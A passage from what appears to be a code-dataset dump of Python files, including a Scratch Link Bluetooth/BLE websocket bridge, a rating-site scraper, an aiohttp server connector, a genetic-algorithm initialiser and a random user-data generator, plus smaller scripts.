bins=ztab)[0]/sky_coverage/input.deltazbin/input.alpha\n panel1.plot(dndz['z_center'],Ng,'-.',label='random with selection',c='yellow')\n panel2.plot(dndz['z_center'][pos],Ng[pos]/Nmodel[pos],'-.',c='yellow')\n \n\n\n\npanel1.legend()\n\nif input.SHOW:\n plt.show()\n\nplt.savefig(filenames.plot_dndz(input))\nprint(\"## written image in file {}\".format(filenames.plot_dndz(input)))\n\nif COMPLETENESS and second_dndz_fname is not None:\n\n plt.figure()\n plt.plot(dndz['z_center'],dndz['N_gal']/dndz2['N_gal'])\n plt.xlabel('redshift')\n plt.ylabel('completeness')\n plt.ylim([0,1.1])\n plt.plot(dndz['z_center'],np.ones_like(dndz['z_center']),c='k')\n plt.show()\n","sub_path":"Pipeline/plot_dndz.py","file_name":"plot_dndz.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"486906169","text":"#!/users/eprakash/anaconda2/bin/python\n\nimport sys\nimport re\nfrom collections import OrderedDict\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"regionSize\", type=int,\n help=\"Size of region in base pairs e.g. 400\")\nargs = parser.parse_args()\nregionSize = args.regionSize\n#print(\"regionSize is \" + str(regionSize))\n\n\nfor line in sys.stdin:\n\tmatch = re.match(\"(\\S+)\\s+(\\d+)\\s+\\S+\\s+\\S+\\s+\\S+\\s+\\S+\\s+\\S+\\s+\\S+\\s+\\S+\\s+(\\d+)\\s*$\", line)\n\tif match:\n\t\tchrom = match.group(1)\t\n\t\tchromStart = int(match.group(2))\n\t\tchromSummitOffset = int(match.group(3))\n\t\tregionStart = chromStart + chromSummitOffset - int(regionSize/2)\n\t\tregionEnd = regionStart + regionSize\n\t\tprint(\"\" + chrom + \"\\t\" + str(regionStart) + \"\\t\" + str(regionEnd))\n","sub_path":"evautils/narrowpeaks_to_bed.py","file_name":"narrowpeaks_to_bed.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"501539819","text":"#!/usr/bin/env python\nimport select\nimport struct\n\n\"\"\"Scratch link on bluepy\"\"\"\n\nimport asyncio\nimport pathlib\nimport ssl\nimport websockets\nimport json\nimport base64\nimport logging\nimport sys\nimport signal\nimport traceback\n\n# for Bluetooth (e.g. Lego EV3)\nimport bluetooth\n\n# for BLESession (e.g. BBC micro:bit)\nfrom bluepy.btle import Scanner, UUID, Peripheral, DefaultDelegate\nfrom bluepy.btle import BTLEDisconnectError, BTLEManagementError\n\nimport threading\nimport time\nimport queue\n\nlogLevel = logging.INFO\n\n# handle command line options\nif __name__ == \"__main__\":\n opts = [opt for opt in sys.argv[1:] if opt.startswith(\"-\")]\n if \"-h\" in opts:\n print((f\"Usage: {sys.argv[0]} [OPTS]\\n\"\n \"OPTS:\\t-h Show this help.\\n\"\n \"\\t-d Print debug messages.\"\n ))\n sys.exit(1)\n elif \"-d\" in opts:\n print(\"Print debug messages\")\n logLevel = logging.DEBUG\n\n# for logging\nlogger = logging.getLogger(__name__)\nhandler = logging.StreamHandler()\nhandler.setLevel(logLevel)\nlogger.setLevel(logLevel)\nlogger.addHandler(handler)\nlogger.propagate = False\n\nclass Session():\n \"\"\"Base class for BTSession and BLESession\"\"\"\n def __init__(self, websocket, loop):\n self.websocket = websocket\n self.loop = loop\n self.lock = threading.RLock()\n self.notification_queue = queue.Queue()\n\n async def recv_request(self):\n \"\"\"\n Handle a request from Scratch through websocket.\n Return True when the sessino should end.\n \"\"\"\n logger.debug(\"start recv_request\")\n try:\n req = await asyncio.wait_for(self.websocket.recv(), 0.0001)\n except asyncio.TimeoutError:\n return False\n logger.debug(f\"request: {req}\")\n jsonreq = json.loads(req)\n if jsonreq['jsonrpc'] != '2.0':\n logger.error(\"error: jsonrpc version is not 2.0\")\n return True\n jsonres = self.handle_request(jsonreq['method'], jsonreq['params'])\n if 'id' in jsonreq:\n jsonres['id'] = jsonreq['id']\n response = json.dumps(jsonres)\n logger.debug(f\"response: {response}\")\n await self.websocket.send(response)\n if self.end_request():\n return True\n return False\n\n def handle_request(self, method, params):\n \"\"\"Default request handler\"\"\"\n logger.debug(f\"default handle_request: {method}, {params}\")\n\n def end_request(self):\n \"\"\"\n Default callback at request end. This callback is required to\n allow other websocket usage out of the request handler.\n Return true when the session should end.\n \"\"\"\n logger.debug(\"default end_request\")\n return False\n\n def notify(self, key, params):\n self.notification_queue.put((key, params))\n\n async def _send_notifications(self):\n \"\"\"\n Notify BT/BLE device events to scratch.\n \"\"\"\n logger.debug(\"start to notify\")\n # flush notification queue\n while not self.notification_queue.empty():\n method, params = self.notification_queue.get()\n await self._send_notification(method, params)\n\n async def _send_notification(self, method, params):\n jsonn = { 'jsonrpc': \"2.0\", 'method': method }\n jsonn['params'] = params\n notification = json.dumps(jsonn)\n logger.debug(f\"notification: {notification}\")\n await self.websocket.send(notification)\n\n async def handle(self):\n logger.debug(\"start session hanlder\")\n await self.recv_request()\n await asyncio.sleep(0.1)\n while True:\n if await self.recv_request():\n break\n await self._send_notifications()\n logger.debug(\"in handle loop\")\n\nclass BTSession(Session):\n \"\"\"Manage a session for Bluetooth device\"\"\"\n\n INITIAL = 1\n DISCOVERY = 2\n DISCOVERY_COMPLETE = 3\n CONNECTED = 4\n DONE = 5\n\n # Split this into discovery thread and communication thread\n # discovery thread should auto-terminate\n\n class BTThread(threading.Thread):\n \"\"\"\n Separated thread to control notifications to Scratch.\n It handles device discovery notification in DISCOVERY status\n and notifications from bluetooth devices in CONNECTED status.\n \"\"\"\n\n class BTDiscoverer(bluetooth.DeviceDiscoverer):\n\n def __init__(self, major_class, minor_class):\n super().__init__()\n self.major_class = major_class\n self.minor_class = minor_class\n self.found_devices = {}\n self.done = False\n\n def pre_inquiry(self):\n self.done = False\n\n def device_discovered(self, address, device_class, rssi, name):\n logger.debug(f\"Found device {name} addr={address} class={device_class} rssi={rssi}\")\n major_class = (device_class & 0x1F00) >> 8\n minor_class = (device_class & 0xFF) >> 2\n if major_class == self.major_class and minor_class == self.minor_class:\n self.found_devices[address] = (name, device_class, rssi)\n\n def inquiry_complete(self):\n self.done = True\n\n def __init__(self, session, major_device_class, minor_device_class):\n threading.Thread.__init__(self)\n self.session = session\n self.major_device_class = major_device_class\n self.minor_device_class = minor_device_class\n self.cancel_discovery = False\n self.ping_time = None\n\n def discover(self):\n discoverer = self.BTDiscoverer(self.major_device_class, self.minor_device_class)\n discoverer.find_devices(lookup_names=True)\n while self.session.status == self.session.DISCOVERY and not discoverer.done and not self.cancel_discovery:\n readable = select.select([discoverer], [], [], 0.5)[0]\n if discoverer in readable:\n discoverer.process_event()\n for addr, (device_name, device_class, rssi) in discoverer.found_devices.items():\n logger.debug(f\"notifying discovered {addr}: {device_name}\")\n params = {\"rssi\": rssi, 'peripheralId': addr, 'name': device_name.decode(\"utf-8\")}\n self.session.notify('didDiscoverPeripheral', params)\n discoverer.found_devices.clear()\n\n if not discoverer.done:\n discoverer.cancel_inquiry()\n\n def run(self):\n while self.session.status != self.session.DONE:\n\n logger.debug(\"loop in BT thread\")\n current_time = int(round(time.time()))\n\n if self.session.status == self.session.DISCOVERY and not self.cancel_discovery:\n logger.debug(\"in discovery status:\")\n try:\n self.discover()\n self.ping_time = current_time + 5\n finally:\n self.session.status = self.session.DISCOVERY_COMPLETE\n\n elif self.session.status == self.session.CONNECTED:\n logger.debug(\"in connected status:\")\n sock = self.session.sock\n try:\n ready = select.select([sock], [], [], 1)\n if ready[0]:\n header = sock.recv(2)\n [msg_len] = struct.unpack(\" 0:\n logger.debug(params)\n\n res = { \"jsonrpc\": \"2.0\" }\n\n if self.status == self.INITIAL and method == 'discover':\n logger.debug(\"Starting async discovery\")\n self.status = self.DISCOVERY\n self.bt_thread = self.BTThread(self, params[\"majorDeviceClass\"], params[\"minorDeviceClass\"])\n self.bt_thread.start()\n res[\"result\"] = None\n\n elif self.status in [self.DISCOVERY, self.DISCOVERY_COMPLETE] and method == 'connect':\n\n # Cancel discovery\n while self.status == self.DISCOVERY:\n logger.debug(\"Cancelling discovery\")\n self.bt_thread.cancel_discovery = True\n time.sleep(1)\n\n addr = params['peripheralId']\n logger.debug(f\"connecting to the BT device {addr}\")\n try:\n self.sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\n self.sock.connect((addr, 1))\n logger.info(f\"connected to BT device: {addr}\")\n except bluetooth.BluetoothError as e:\n logger.error(f\"failed to connect to BT device: {e}\", exc_info=e)\n self.status = self.DONE\n self.sock = None\n\n if self.sock:\n res[\"result\"] = None\n self.status = self.CONNECTED\n else:\n err_msg = f\"BT connect failed: {addr}\"\n res[\"error\"] = { \"message\": err_msg }\n self.status = self.DONE\n\n elif self.status == self.CONNECTED and method == 'send':\n logger.debug(\"handle send request\")\n if params['encoding'] != 'base64':\n logger.error(\"encoding other than base 64 is not \"\n \"yet supported: \", params['encoding'])\n msg_bstr = params['message'].encode('ascii')\n data = base64.standard_b64decode(msg_bstr)\n self.sock.send(data)\n res['result'] = len(data)\n\n logger.debug(res)\n return res\n\n def end_request(self):\n logger.debug(f\"end_request of BTSession {self}\")\n return self.status == self.DONE\n\n\nclass BLESession(Session):\n \"\"\"\n Manage a session for Bluetooth Low Energy device such as micro:bit\n \"\"\"\n\n INITIAL = 1\n DISCOVERY = 2\n CONNECTED = 3\n DONE = 4\n\n SERVICE_CLASS_UUID_ADTYPES = {\n 0x7: \"adtype complete 128b\",\n 0x3: \"adtype complete 16b\",\n 0x6: \"adtype incomplete 128b\",\n 0x5: \"adtype complete 32b\",\n 0x4: \"adtype incomplete 32b\",\n 0x2: \"adtype incomplete 16b\",\n }\n\n class BLEThread(threading.Thread):\n \"\"\"\n Separated thread to control notifications to Scratch.\n It handles device discovery notification in DISCOVERY status\n and notifications from BLE devices in CONNECTED status.\n \"\"\"\n def __init__(self, session):\n threading.Thread.__init__(self)\n self.session = session\n\n def run(self):\n while True:\n logger.debug(\"loop in BLE thread\")\n if self.session.status == self.session.DISCOVERY:\n logger.debug(\"send out found devices\")\n devices = self.session.found_devices\n for d in devices:\n params = { 'rssi': d.rssi }\n params['peripheralId'] = devices.index(d)\n params['name'] = d.getValueText(0x9)\n self.session.notify('didDiscoverPeripheral', params)\n time.sleep(1)\n elif self.session.status == self.session.CONNECTED:\n logger.debug(\"in connected status:\")\n delegate = self.session.delegate\n if delegate and len(delegate.handles) > 0:\n if not delegate.restart_notification_event.is_set():\n delegate.restart_notification_event.wait()\n try:\n logger.debug(\"getting lock for waitForNotification\")\n with self.session.lock:\n logger.debug(\"before waitForNotification\")\n self.session.perip.waitForNotifications(0.0001)\n logger.debug(\"after waitForNotification\")\n logger.debug(\"released lock for waitForNotification\")\n except Exception as e:\n logger.error(e)\n self.session.close()\n break\n else:\n time.sleep(0.0)\n # To avoid repeated lock by this single thread,\n # yield CPU to other lock waiting threads.\n time.sleep(0)\n else:\n # Nothing to do:\n time.sleep(0)\n\n class BLEDelegate(DefaultDelegate):\n \"\"\"\n A bluepy handler to receive notifictions from BLE devices.\n \"\"\"\n def __init__(self, session):\n DefaultDelegate.__init__(self)\n self.session = session\n self.handles = {}\n self.restart_notification_event = threading.Event()\n self.restart_notification_event.set()\n\n def add_handle(self, serviceId, charId, handle):\n logger.debug(f\"add handle for notification: {handle}\")\n params = { 'serviceId': UUID(serviceId).getCommonName(),\n 'characteristicId': charId,\n 'encoding': 'base64' }\n self.handles[handle] = params\n\n def handleNotification(self, handle, data):\n logger.debug(f\"BLE notification: {handle} {data}\")\n params = self.handles[handle].copy()\n params['message'] = base64.standard_b64encode(data).decode('ascii')\n self.session.notify('characteristicDidChange', params)\n\n def __init__(self, websocket, loop):\n super().__init__(websocket, loop)\n self.status = self.INITIAL\n self.found_devices = []\n self.device = None\n self.perip = None\n self.delegate = None\n\n def close(self):\n self.status = self.DONE\n if self.perip:\n logger.info(f\"disconnect to BLE peripheral: {self.perip}\")\n self.perip.disconnect()\n\n def __del__(self):\n self.close()\n\n def _get_dev_uuid(self, dev):\n for adtype in self.SERVICE_CLASS_UUID_ADTYPES:\n service_class_uuid = dev.getValueText(adtype)\n if service_class_uuid:\n logger.debug(self.SERVICE_CLASS_UUID_ADTYPES[adtype])\n return UUID(service_class_uuid)\n return None\n\n def matches(self, dev, filters):\n \"\"\"\n Check if the found BLE device mathces the filters Scracth specifies.\n \"\"\"\n logger.debug(f\"in matches {dev} {filters}\")\n for f in filters:\n if 'services' in f:\n for s in f['services']:\n logger.debug(f\"sevice to check: {s}\")\n given_uuid = s\n logger.debug(f\"given: {given_uuid}\")\n dev_uuid = self._get_dev_uuid(dev)\n if not dev_uuid:\n continue\n logger.debug(f\"dev: {dev_uuid}\")\n logger.debug(given_uuid == dev_uuid)\n if given_uuid == dev_uuid:\n logger.debug(\"match...\")\n return True\n if 'name' in f or 'manufactureData' in f:\n logger.error(\"name/manufactureData filters not implemented\")\n # TODO: implement other filters defined:\n # ref: https://github.com/LLK/scratch-link/blob/develop/Documentation/BluetoothLE.md\n return False\n\n def _get_service(self, service_id):\n with self.lock:\n service = self.perip.getServiceByUUID(UUID(service_id))\n\n def _get_characteristic(self, chara_id):\n if not self.perip:\n return None\n with self.lock:\n charas = self.perip.getCharacteristics(uuid=chara_id)\n return charas[0]\n\n def handle_request(self, method, params):\n \"\"\"Handle requests from Scratch\"\"\"\n if self.delegate:\n # Do not allow notification during request handling to avoid\n # websocket server errors\n self.delegate.restart_notification_event.clear()\n\n logger.debug(\"handle request to BLE device\")\n logger.debug(method)\n if len(params) > 0:\n logger.debug(params)\n\n res = { \"jsonrpc\": \"2.0\" }\n err_msg = None\n\n if self.status == self.INITIAL and method == 'discover':\n scanner = Scanner()\n try:\n devices = scanner.scan(1.0)\n for dev in devices:\n if self.matches(dev, params['filters']):\n self.found_devices.append(dev)\n except BTLEManagementError as e:\n logger.error(e);\n err_msg = \"Can not scan BLE devices. Check BLE controller.\"\n logger.error(err_msg);\n res[\"error\"] = { \"message\": err_msg }\n self.status = self.DONE\n\n if len(self.found_devices) == 0 and not err_msg:\n err_msg = (f\"BLE service not found: {params['filters']}. \"\n \"Check BLE device.\")\n res[\"error\"] = { \"message\": err_msg }\n logger.error(err_msg)\n self.status = self.DONE\n else:\n res[\"result\"] = None\n self.status = self.DISCOVERY\n self.ble_thread = self.BLEThread(self)\n self.ble_thread.start()\n\n elif self.status == self.DISCOVERY and method == 'connect':\n logger.debug(\"connecting to the BLE device\")\n self.device = self.found_devices[params['peripheralId']]\n try:\n self.perip = Peripheral(self.device.addr,\n self.device.addrType)\n logger.info(f\"connect to BLE peripheral: {self.perip}\")\n except BTLEDisconnectError as e:\n logger.error(f\"failed to connect to BLE device: {e}\")\n self.status = self.DONE\n\n if self.perip:\n res[\"result\"] = None\n self.status = self.CONNECTED\n self.delegate = self.BLEDelegate(self)\n self.perip.withDelegate(self.delegate)\n else:\n err_msg = f\"BLE connect failed :{self.device}\"\n res[\"error\"] = { \"message\": err_msg }\n self.status = self.DONE\n\n elif self.status == self.CONNECTED and method == 'read':\n logger.debug(\"handle read request\")\n service_id = params['serviceId']\n chara_id = params['characteristicId']\n c = self._get_characteristic(chara_id)\n if not c or c.uuid != UUID(chara_id):\n logger.error(\"Failed to get characteristic {chara_id}\")\n self.status = self.DONE\n else:\n with self.lock:\n b = c.read()\n message = base64.standard_b64encode(b).decode('ascii')\n res['result'] = { 'message': message, 'encode': 'base64' }\n if params.get('startNotifications') == True:\n self.startNotifications(service_id, chara_id)\n\n elif self.status == self.CONNECTED and method == 'startNotifications':\n logger.debug(\"handle startNotifications request\")\n service_id = params['serviceId']\n chara_id = params['characteristicId']\n self.startNotifications(service_id, chara_id)\n\n elif self.status == self.CONNECTED and method == 'stopNotifications':\n logger.debug(\"handle stopNotifications request\")\n service_id = params['serviceId']\n chara_id = params['characteristicId']\n self.stopNotifications(service_id, chara_id)\n\n elif self.status == self.CONNECTED and method == 'write':\n logger.debug(\"handle write request\")\n service_id = params['serviceId']\n chara_id = params['characteristicId']\n c = self._get_characteristic(chara_id)\n if not c or c.uuid != UUID(chara_id):\n logger.error(\"Failed to get characteristic {chara_id}\")\n self.status = self.DONE\n else:\n if params['encoding'] != 'base64':\n logger.error(\"encoding other than base 64 is not \"\n \"yet supported: \", params['encoding'])\n msg_bstr = params['message'].encode('ascii')\n data = base64.standard_b64decode(msg_bstr)\n logger.debug(\"getting lock for c.write()\")\n with self.lock:\n c.write(data)\n logger.debug(\"released lock for c.write()\")\n res['result'] = len(data)\n\n logger.debug(res)\n return res\n\n def setNotifications(self, service_id, chara_id, value):\n service = self._get_service(service_id)\n c = self._get_characteristic(chara_id)\n handle = c.getHandle()\n # prepare notification handler\n self.delegate.add_handle(service_id, chara_id, handle)\n # request notification to the BLE device\n with self.lock:\n self.perip.writeCharacteristic(handle + 1, value, True)\n\n def startNotifications(self, service_id, chara_id):\n logger.debug(f\"start notification for {chara_id}\")\n self.setNotifications(service_id, chara_id, b\"\\x01\\x00\")\n\n def stopNotifications(self, service_id, chara_id):\n logger.debug(f\"stop notification for {chara_id}\")\n self.setNotifications(service_id, chara_id, b\"\\x00\\x00\")\n\n def end_request(self):\n logger.debug(\"end_request of BLESession\")\n if self.delegate:\n self.delegate.restart_notification_event.set()\n return self.status == self.DONE\n\n# kick start WSS server\nssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)\nlocalhost_cer = pathlib.Path(__file__).with_name(\"scratch-device-manager.cer\")\nlocalhost_key = pathlib.Path(__file__).with_name(\"scratch-device-manager.key\")\nssl_context.load_cert_chain(localhost_cer, localhost_key)\nsessionTypes = { '/scratch/ble': BLESession, '/scratch/bt': BTSession }\n\nasync def ws_handler(websocket, path):\n try:\n logger.info(f\"Start session for web socket path: {path}\")\n loop = asyncio.get_event_loop()\n session = sessionTypes[path](websocket, loop)\n await session.handle()\n except Exception as e:\n logger.error(f\"Failure in session for web socket path: {path}\")\n logger.error(e)\n\nstart_server = websockets.serve(\n ws_handler, \"device-manager.scratch.mit.edu\", 20110, ssl=ssl_context\n)\n\ndef stack_trace():\n print(\"in stack_trace\")\n code = []\n for threadId, stack in sys._current_frames().items():\n code.append(\"\\n# ThreadID: %s\" % threadId)\n for filename, lineno, name, line in traceback.extract_stack(stack):\n code.append('File: \"%s\", line %d, in %s' % (filename,\n lineno, name))\n if line:\n code.append(\" %s\" % (line.strip()))\n\n for line in code:\n print(line)\n\nwhile True:\n try:\n asyncio.get_event_loop().run_until_complete(start_server)\n logger.info(\"Started scratch-link\")\n asyncio.get_event_loop().run_forever()\n except KeyboardInterrupt as e:\n stack_trace()\n break\n except Exception as e:\n logger.info(\"Restarting scratch-link...\")\n\n","sub_path":"scratch_link.py","file_name":"scratch_link.py","file_ext":"py","file_size_in_byte":25222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"591304886","text":"import requests\nimport pandas as pd\nimport os\n\nfor i in range(1, 173204):\n pageUrl = 'http://rating.chgk.info/api/players/'+str(i)+'/rating/'\n r = requests.get(pageUrl)\n\n with open('E:\\\\test4.xml', 'w') as output_file:\n output_file.write(r.text)\n\n lines = []\n with open('E:\\\\test4.xml', 'r+') as f:\n lines = f.readlines()\n\n IDPlayerList = []\n IDReleaseList = []\n ratingList = []\n ratingPositionList = []\n dateList = []\n champInYearList = []\n champsTotalList = []\n\n for line in lines:\n if(line.startswith(' \"idplayer\": \"')):\n print(line[len(' \"idplayer\": \"'):-3])\n IDPlayerList.append(line[len(' \"idplayer\": \"'):-3])\n continue\n if(line.startswith(' \"idrelease\": \"')):\n print(line[len(' \"idrelease\": \"'):-3])\n IDReleaseList.append(line[len(' \"idrelease\": \"'):-3])\n continue\n if(line.startswith(' \"rating\": \"')):\n print(line[len(' \"rating\": \"'):-3])\n ratingList.append(line[len(' \"rating\": \"'):-3])\n continue\n if(line.startswith(' \"rating_position\": \"')):\n print(line[len(' \"rating_position\": \"'):-3])\n ratingPositionList.append(line[len(' \"rating_position\": \"'):-3])\n continue\n if(line.startswith(' \"date\": \"')):\n print(line[len(' \"date\": \"'):-3])\n dateList.append(line[len(' \"date\": \"'):-3])\n continue\n if(line.startswith(' \"tournaments_in_year\": \"')):\n print(line[len(' \"tournaments_in_year\": \"'):-3])\n champInYearList.append(line[len(' \"tournaments_in_year\": \"'):-3])\n continue\n if(line.startswith(' \"tournament_count_total\": \"')):\n print(line[len(' \"tournament_count_total\": \"'):-2])\n champsTotalList.append(line[len(' \"tournament_count_total\": \"'):-2])\n continue\n \n data = {'ID Player' : IDPlayerList,\n 'ID Release': IDReleaseList,\n 'Rating': ratingList,\n 'Rating Position': ratingPositionList,\n 'Date' : dateList,\n 'Tournaments In Year': champInYearList,\n 'Tournaments Count Total': champsTotalList}\n \n dataFrame = pd.DataFrame(data = data)\n dataFrame.set_index('ID Player', drop=True, inplace=True)\n\n filePath = 'E:\\\\playersRating.csv'\n if not os.path.isfile(filePath):\n dataFrame.to_csv(filePath, sep=',', encoding='utf-16')\n else:\n dataFrame.to_csv(filePath, encoding='utf-16', mode='a', sep=',', header=False)\n","sub_path":"_0. DWH/Projects/Viktoriya_Gruzitskaya/dwso/sources/scripts for data extract/PlayerRatingParser.py","file_name":"PlayerRatingParser.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"607094465","text":"import asyncio\nimport logging\nfrom asyncio import Queue\n\nimport aiohttp\nfrom aiohttp import web\n\nfrom .exceptions import DestinationNotAvailable\n\nfrom .base import BaseConnector\n\nlogger = logging.getLogger(__name__)\n\n\nclass ServerConnector(BaseConnector):\n \"\"\"ServerConnector creates a aiohttp based\n Web Server. This connector should be the parent class\n for all push-based connectors.\n \"\"\"\n\n connection_type = \"SERVER\"\n\n def __init__(self, host=\"localhost\", port=8777):\n self.RECEIVED_DATA_QUEUE = Queue(maxsize=500)\n self.host = host\n self.port = port\n self.app = web.Application()\n self.runner = None\n self.site = None\n\n async def start(self):\n \"\"\"start runs the server and starts listening\n to requests.\n\n Raises:\n DestinationNotAvailable: Raised if the selected port:host\n combo is unavailable\n \"\"\"\n self.runner = web.AppRunner(self.app)\n await self.runner.setup()\n self.site = web.TCPSite(self.runner, self.host, self.port)\n try:\n await self.site.start()\n except OSError as e:\n raise DestinationNotAvailable(\n f'Connection Failed: Error connecting to'\n f' {self.host}:{self.port} - {e}'\n ) from None\n\n async def echo(self, _):\n \"\"\"echo sends a generic response on request. This is to\n demonstrate how to create a request handler.\n\n Arguments:\n request {HTTPRequest} -- aio request\n\n Returns:\n HTTPResponse -- http Response for the request\n \"\"\"\n return web.Response(text=f'Hello from {self.host}:{self.port}\\n'\n f'{self.get_connection_details()}')\n\n def get_connection_details(self):\n \"\"\"return the connection details as a dict\n\n Returns:\n dict -- connection details dictionary\n \"\"\"\n return dict(connection_type=self.connection_type,\n host=self.host, port=self.port)\n\n async def handle_received_data(self, data):\n \"\"\"handle_received_data stores the data into the\n received_data_queue. This queue is exposed for consumption\n by other objects/pipelines.\n \"\"\"\n if not data:\n return\n logger.debug(\"Enqueuing data in RECEIVED_DATA_QUEUE\")\n await self.RECEIVED_DATA_QUEUE.put(data)\n\n async def stop(self):\n \"\"\"stops the server and runs the cleanup\n \"\"\"\n self.RECEIVED_DATA_QUEUE = Queue(maxsize=500)\n await self.runner.cleanup()\n","sub_path":"tcp_connectors/server_connector.py","file_name":"server_connector.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"156672246","text":"##!/usr/bin/python3\n\nfrom pyrob.api import *\n\n\n@task(delay=0.02)\ndef task_2_4():\n N = 0\n while N != 5:\n n = 0\n while n != 10:\n move_right(2)\n move_down(1)\n fill_cell()\n move_up(1)\n move_left()\n fill_cell()\n move_down()\n fill_cell()\n move_down()\n fill_cell()\n move_up()\n move_left()\n fill_cell()\n if n != 9:\n move_right(4)\n move_up()\n n += 1\n while not wall_is_on_the_left():\n move_left()\n if N != 4:\n move_down(3)\n N += 1\n move_up()\n pass\n\n\nif __name__ == '__main__':\n run_tasks()\n","sub_path":"task_26.py","file_name":"task_26.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"485490417","text":"import sys\r\nsys.path.append(\".\")\r\n\r\nimport settings\r\nimport numpy as np\r\n\r\ndef randomUniform():\r\n\r\n size = settings.neural_network['size']\r\n\r\n weights = []\r\n for layer in range(0, len(size) - 1, 1):\r\n weights.append(np.random.uniform(-1, 1, (size[layer], size[layer+1])))\r\n\r\n biases = []\r\n for layer in range(1, len(size), 1):\r\n biases.append(np.random.uniform(-1, 1, (size[layer], 1)))\r\n\r\n return weights, biases\r\n\r\ndef randomStart(population):\r\n\r\n if settings.genetic_algorithm['random start'] == 'random uniform':\r\n for individual in population.individuals:\r\n individual.neural_network.weights, individual.neural_network.biases = randomUniform()\r\n\r\n else:\r\n raise Exception(\"Random start option not found!\")\r\n\r\n return population","sub_path":"genetic_algorithm/random_start.py","file_name":"random_start.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"230442915","text":"from graphics import *\n\ndef main():\n win = GraphWin('Floor', 500, 500)\n\n win.setCoords(0.0, 0.0, 10.0, 10.0)\n win.setBackground(\"yellow\")\n\n # draw grid\n for x in range(10):\n for y in range(10):\n win.plotPixel(x*50, y*50, \"blue\")\n\n square = Rectangle(Point(5,5), Point(6,6))\n square.draw(win)\n square.setFill(\"black\")\n\n win.getMouse()\n win.close()\n\nmain()\n","sub_path":"ModelAlternative/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"157631023","text":"import os\nimport random\nimport string\nimport math\nfrom datetime import datetime, timedelta\nfrom random import randrange\n\n\ndirectory_path = os.path.dirname(__file__)\n\n# Usernames\ndef username(num_results=1):\n adjectives, nouns = [], []\n with open(os.path.join(directory_path, 'data', 'adjectives.txt'), 'r') as file_adjective:\n with open(os.path.join(directory_path, 'data', 'nouns.txt'), 'r') as file_noun:\n for line in file_adjective:\n adjectives.append(line.strip())\n for line in file_noun:\n nouns.append(line.strip())\n\n usernames = []\n for _ in range(num_results):\n adjective = random.choice(adjectives)\n noun = random.choice(nouns).capitalize()\n num = str(random.randrange(10))\n usernames.append(adjective + noun + num)\n\n return usernames\n\n# Email domains\ndef emailDomain():\n with open(os.path.join(directory_path, 'data', 'domains.txt'), 'r') as file_domain:\n dom = random.choice(file_domain.read().splitlines())\n domain = '@' + dom\n\n return domain\n\n# First names\ndef firstName():\n with open(os.path.join(directory_path, 'data', 'firstNames.txt'), 'r') as file_fNames:\n name = random.choice(file_fNames.read().splitlines())\n\n return name\n\n# Last names\ndef lastName():\n with open(os.path.join(directory_path, 'data', 'lastNames.txt'), 'r') as file_lNames:\n name = random.choice(file_lNames.read().splitlines())\n\n return name\n\n# Passwords\ndef password(length = 11):\n chars = string.ascii_letters + string.digits \n pw = ''\n for i in range(length):\n pw += pw.join(random.choice(chars))\n\n return pw\n\n# Creation times\ndef createTime():\n oldest = datetime.strptime('1/1/2009', '%m/%d/%Y')\n newest= datetime.strptime('12/31/2019', '%m/%d/%Y')\n delta = newest - oldest\n dateRange = (delta.days)\n randomDays = randrange(dateRange) \n date = oldest + timedelta(days=randomDays)\n\n return date\n\n# Last update times\ndef lastUpdate(oldest = datetime.strptime('1/1/2009', '%m/%d/%Y')):\n newest= datetime.strptime('12/31/2019', '%m/%d/%Y')\n delta = newest - oldest\n dateRange = (delta.days)\n randomDays = randrange(dateRange) \n date = oldest + timedelta(days=randomDays)\n date = date.date()\n\n return date\n\ndef ageList(POPULATION):\n #age = os.path.dirname(__file__) + '/ages.txt'\n\n RANGES = [(13,17),(18,24),(25,34),(35,44),(45,54),(55,64),(65,116)] # min, max age for each age group\n AGES = len(RANGES) # number of age groups\n DIST = [.058,.25,.322,.165,.102,.06,.043] #distribution of the age groups\n\n agelist = []\n\n for i in range (AGES):\n for x in range (math.ceil(POPULATION * DIST[i])):\n agelist.append(random.randint(RANGES[i][0], RANGES[i][1]))\n \n\n # with open(age,'w+',encoding='utf-8') as file:\n # for age in agelist:\n # file.write(str(age) + '\\n')\n return agelist\n\n\n\n\n \n","sub_path":"A09/RandomDataGeneratorA09/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"597822235","text":"'''\n1. 根据url获取信息\n\n'''\n\nimport random\nimport requests\nimport time\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport pymysql\n\nimport tablib\n\ncount=1\nuser_agent_list = [\n\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\",\n# \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36\",\n# \"Mozilla/5.0 (Windows NT 10.0; WOW64) Gecko/20100101 Firefox/61.0\",\n# \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36\",\n# \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 